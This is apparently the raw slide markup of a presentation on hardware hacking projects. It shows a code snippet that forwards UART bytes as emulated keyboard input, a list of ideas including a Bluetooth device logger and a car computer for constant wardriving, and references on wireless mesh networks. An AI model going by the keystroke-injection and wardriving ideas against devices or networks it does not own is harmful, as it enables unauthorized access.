                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>incomingByte</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </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dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>Uart</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>read</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>();</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>Keyboard</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>print</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>incomingByte</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">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val="2156302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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bluetooth Device Logger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Power over Ethernet?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BackTrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> environment for ARM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Car-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>puter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> for constant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wardrive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mesh Network…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25017802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 on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>esh networks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Needs a clear front runner for setting up such a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Wikipedia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>if nothing else</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>en.wikipedia.org/wiki/Wireless_mesh_network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Village </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Infrastructure in a Kit-Alpha (VIKA) Project</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.cuwin.net/node/325</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>U.S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. Underwrites Internet Detour Around Censors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.nytimes.com/2011/06/12/world/12internet.html?_r=2&amp;pagewanted=all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339080022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Mesh/Store and forward</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="252837" y="3771655"/>
            <a:ext cx="914400" cy="838200"/>
            <a:chOff x="1828800" y="3048000"/>
            <a:chExt cx="1300409" cy="1300409"/>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0"/>
              <a:ext cx="1300409" cy="13004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093" y="3195555"/>
              <a:ext cx="655822" cy="614445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:gr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72237" y="5143254"/>
            <a:ext cx="650205" cy="650205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4863149" y="1994689"/>
            <a:ext cx="914400" cy="838200"/>
            <a:chOff x="1828800" y="3048000"/>
            <a:chExt cx="1300409" cy="1300409"/>
          </a:xfrm>
        </p:grpSpPr>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0"/>
              <a:ext cx="1300409" cy="130040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093" y="3195555"/>
              <a:ext cx="655822" cy="614445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>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59540" y="3688842"/>
            <a:ext cx="650205" cy="650205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2764687" y="3099590"/>
            <a:ext cx="914400" cy="838200"/>
            <a:chOff x="1828800" y="3048000"/>
            <a:chExt cx="1300409" cy="1300409"/>
          </a:xfrm>
        </p:grpSpPr>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0"/>
              <a:ext cx="1300409" cy="130040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093" y="3195555"/>
              <a:ext cx="655822" cy="614445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Picture 3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01197" y="2112598"/>
            <a:ext cx="650205" cy="650205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4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81476" y="1193237"/>
            <a:ext cx="1083016" cy="1083016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 4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95338" y="5153355"/>
            <a:ext cx="1083016" cy="1083016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="Group 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1101197" y="4904048"/>
            <a:ext cx="914400" cy="838200"/>
            <a:chOff x="1828800" y="3048000"/>
            <a:chExt cx="1300409" cy="1300409"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="44" name="Picture 4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0"/>
              <a:ext cx="1300409" cy="1300409"/>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093" y="3195555"/>
              <a:ext cx="655822" cy="614445"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Group 45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1593957" y="4586549"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Arc 46"/>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0" name="Straight Arrow Connector 49"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="1"/>
            <a:endCxn id="44" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1558397" y="3518690"/>
            <a:ext cx="1206290" cy="1385358"/>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6" idx="2"/>
            <a:endCxn id="44" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1426300" y="2762803"/>
            <a:ext cx="132097" cy="2141245"/>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4" idx="0"/>
            <a:endCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1167237" y="4190755"/>
            <a:ext cx="391160" cy="713293"/>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4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2015597" y="5323148"/>
            <a:ext cx="1206290" cy="145208"/>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0" idx="2"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3221887" y="3937790"/>
            <a:ext cx="175453" cy="1205464"/>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0" idx="3"/>
            <a:endCxn id="42" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3679087" y="3518690"/>
            <a:ext cx="1757759" cy="1634665"/>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1" idx="2"/>
            <a:endCxn id="42" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3822984" y="2276253"/>
            <a:ext cx="1613862" cy="2877102"/>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1" idx="3"/>
            <a:endCxn id="18" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4364492" y="1734745"/>
            <a:ext cx="498657" cy="679044"/>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8" idx="2"/>
            <a:endCxn id="24" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5320349" y="2832889"/>
            <a:ext cx="764294" cy="855953"/>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2" idx="0"/>
            <a:endCxn id="24" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5436846" y="4339047"/>
            <a:ext cx="647797" cy="814308"/>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41" idx="1"/>
            <a:endCxn id="36" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1751402" y="1734745"/>
            <a:ext cx="1530074" cy="702956"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="254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93795" y="3509194"/>
            <a:ext cx="650205" cy="650205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="93" name="Group 92"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="16200000">
            <a:off x="8200403" y="3140965"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Arc 93"/>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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8545690" y="3465300"/>
            <a:ext cx="318017" cy="223696"/>
            <a:chOff x="2236803" y="4604257"/>
            <a:chExt cx="587399" cy="444241"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="98" name="Picture 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2265850" y="4604257"/>
              <a:ext cx="558352" cy="444241"/>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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2236803" y="4749680"/>
              <a:ext cx="482907" cy="261610"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="100" name="Group 99"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="16363133">
            <a:off x="2806138" y="4834677"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101" name="Arc 100"/>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3281476" y="4825237"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105" name="Arc 104"/>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rot="16363133">
            <a:off x="4435553" y="4795517"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name="Arc 108"/>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 109"/>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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5622754" y="4810870"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="113" name="Arc 112"/>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 113"/>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 114"/>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Group 115"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10300159">
            <a:off x="773639" y="2545044"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="117" name="Arc 116"/>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Arc 118"/>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1277559" y="1748954"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="121" name="Arc 120"/>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 name="Group 123"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5198405">
            <a:off x="1357630" y="2411738"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="125" name="Arc 124"/>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Arc 126"/>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rot="16363133">
            <a:off x="5405144" y="3548745"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="129" name="Arc 128"/>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Arc 130"/>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p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5657265">
            <a:off x="5440477" y="2474153"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="133" name="Arc 132"/>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 133"/>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Group 135"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="16363133">
            <a:off x="4734175" y="1612392"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="Arc 136"/>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Arc 137"/>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Arc 138"/>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Group 143"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5569976">
            <a:off x="483589" y="4439986"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="145" name="Arc 144"/>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Arc 145"/>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Arc 146"/>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Group 147"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="2471610" y="3688842"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149" name="Arc 148"/>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Arc 150"/>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Group 151"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5108781">
            <a:off x="3304098" y="3746771"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="153" name="Arc 152"/>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 name="Group 139"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="2888169" y="1756250"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="141" name="Arc 140"/>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Arc 142"/>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Group 159"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="5108781">
            <a:off x="3920127" y="2004389"/>
            <a:ext cx="711200" cy="636034"/>
            <a:chOff x="1788160" y="3568702"/>
            <a:chExt cx="711200" cy="636034"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="161" name="Arc 160"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1803400" y="3823736"/>
              <a:ext cx="455225" cy="381000"/>
            </a:xfrm>
